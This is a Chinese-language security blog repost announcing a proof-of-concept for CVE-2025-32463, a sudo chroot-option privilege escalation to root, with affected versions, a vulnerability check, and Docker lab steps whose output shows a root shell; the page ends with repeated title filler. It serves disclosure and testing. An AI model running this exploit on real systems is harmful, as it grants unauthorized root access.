通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463

原文链接: https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247531729&idx=2&sn=670e1a9a5783709fe9c44ad380ee9354

通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463

Ots安全 2025-07-07 08:37

通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463

该存储库提供了一个最小的、可重现的环境来演示chroot 功能中的CVE-2025-32463权限提升缺陷。sudo

文件 目的
Dockerfile 使用易受攻击的sudo 1.9.16p2和构建工具构建 Ubuntu 24.04 映像
sudo‑chwoot.sh 概念验证漏洞,在 chroot 中生成 root shell
run.sh
构建镜像(如果需要)并启动漏洞利用容器的辅助脚本

受影响的版本

大多数 Linux 发行版上的sudo 1.9.14至1.9.17(所有 p 修订版)的易受攻击的版本均受到影响。

快速漏洞检查

# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

在 Docker 容器中测试漏洞利用

# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh传递–privileged到–rmDocker,以便容器在您退出时自行清理。

清理

完成后删除图像:

docker rmi sudo-chwoot

项目地址:

https://github.com/pr0v3rbs/CVE-2025-32463_chwoot

感谢您抽出

通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463

.

通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463

.

通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463

来阅读本文

通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463

点它,分享点赞在看都在这